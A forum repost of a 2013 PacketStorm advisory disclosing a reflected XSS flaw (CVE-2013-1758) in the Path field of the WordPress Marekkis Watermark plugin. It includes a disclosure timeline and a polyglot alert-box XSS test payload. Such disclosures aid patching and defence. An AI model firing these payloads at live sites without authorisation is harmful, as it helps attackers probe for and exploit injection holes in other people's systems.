Praetorian503 Posted February 19, 2013 Report Posted February 19, 2013 WordPress Marekkis Watermark plugin suffers from a cross site scripting vulnerability.#############################Exploit Title : Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting VulnerabilityAuthor: Aditya Balapurehome: http://adityabalapure.blogspot.in/Date: 18/02/13software link: http://wordpress.org/extend/plugins/marekkis-watermark/CVE Assigned - CVE-2013-1758#############################Marekkis Watermark-Plugin descriptionMarekkis Watermark-Plugin for WordPress can watermark your pictures an two different ways:Insert your watermark while the picture is being uploaded.After the activation every picture that you will upload with wordpress build-in media-uploader will be watermarked.In the configuration-screen you can set up the position and the type of your watermark. It can be your logo (.png-file) with transparent background or a free text with color, font, size, shadow and transparency-level of your choice. See screenshots.Insert your watermark on all chosen pictures from a directory on your web-server.Marekkis Watermark makes possible to create a watermark on mediafiles that are already uploaded on your server. So you can mark all your old pictures with the new watermark.##########################XSS locationThe Marekkis Watermark-Plugin in Wordpress http://wordpress.org/extend/plugins/marekkis-watermark/ has a Reflected XSS Vulnerability in the Path input box.Script Used-';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>##########################Vendor Notification05/02/2013 to: - Vendor notified awaiting action17/02/2013 - Fixed and closedSource: PacketStorm Quote
